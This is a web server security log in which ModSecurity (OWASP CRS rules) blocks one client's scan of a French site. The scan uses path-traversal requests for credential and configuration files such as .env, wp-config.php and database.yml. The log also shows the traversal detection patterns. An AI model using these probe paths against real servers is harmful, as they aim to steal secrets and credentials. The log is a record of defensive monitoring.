[Tue May 12 05:10:32.620254 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKNr1yOh9TvizeziY6wAAAEc"]
[Tue May 12 05:10:32.620383 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKNr1yOh9TvizeziY6wAAAEc"]
[Tue May 12 05:10:32.620598 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKNr1yOh9TvizeziY6wAAAEc"]
[Tue May 12 05:10:32.639557 2026] [core:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] AH10244: invalid URI path (/img../../../.env)
[Tue May 12 05:10:32.658805 2026] [core:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] AH10244: invalid URI path (/img../../../../.env)
[Tue May 12 05:10:32.676511 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nPAAAARM"]
[Tue May 12 05:10:32.676575 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nPAAAARM"]
[Tue May 12 05:10:32.676693 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nPAAAARM"]
[Tue May 12 05:10:32.676883 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nPAAAARM"]
[Tue May 12 05:10:32.695869 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nPQAAARM"]
[Tue May 12 05:10:32.695946 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nPQAAARM"]
[Tue May 12 05:10:32.696049 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nPQAAARM"]
[Tue May 12 05:10:32.696225 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nPQAAARM"]
[Tue May 12 05:10:32.715155 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKHo6NvB9WXx5V-6nPgAAARM"]
[Tue May 12 05:10:32.715213 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKHo6NvB9WXx5V-6nPgAAARM"]
[Tue May 12 05:10:32.715312 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKHo6NvB9WXx5V-6nPgAAARM"]
[Tue May 12 05:10:32.715495 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKHo6NvB9WXx5V-6nPgAAARM"]
[Tue May 12 05:10:32.736141 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKHo6NvB9WXx5V-6nPwAAARM"]
[Tue May 12 05:10:32.736267 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKHo6NvB9WXx5V-6nPwAAARM"]
[Tue May 12 05:10:32.736442 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKHo6NvB9WXx5V-6nPwAAARM"]
[Tue May 12 05:10:32.756994 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKHo6NvB9WXx5V-6nQAAAARM"]
[Tue May 12 05:10:32.757126 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKHo6NvB9WXx5V-6nQAAAARM"]
[Tue May 12 05:10:32.757301 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKHo6NvB9WXx5V-6nQAAAARM"]
[Tue May 12 05:10:32.776992 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKHo6NvB9WXx5V-6nQQAAARM"]
[Tue May 12 05:10:32.777118 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKHo6NvB9WXx5V-6nQQAAARM"]
[Tue May 12 05:10:32.777292 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKHo6NvB9WXx5V-6nQQAAARM"]
[Tue May 12 05:10:32.799676 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKHo6NvB9WXx5V-6nQgAAARM"]
[Tue May 12 05:10:32.799739 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKHo6NvB9WXx5V-6nQgAAARM"]
[Tue May 12 05:10:32.799837 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKHo6NvB9WXx5V-6nQgAAARM"]
[Tue May 12 05:10:32.800026 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKHo6NvB9WXx5V-6nQgAAARM"]
[Tue May 12 05:10:32.820442 2026] [core:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] AH10244: invalid URI path (/media../../../.env)
[Tue May 12 05:10:32.844504 2026] [core:error] [pid 1825287:tid 1825323] [client 45.148.10.246:21532] AH10244: invalid URI path (/media../../../../.env)
[Tue May 12 05:10:32.961368 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nRAAAAQQ"]
[Tue May 12 05:10:32.961460 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nRAAAAQQ"]
[Tue May 12 05:10:32.961637 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nRAAAAQQ"]
[Tue May 12 05:10:32.961878 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nRAAAAQQ"]
[Tue May 12 05:10:32.982107 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nRQAAAQQ"]
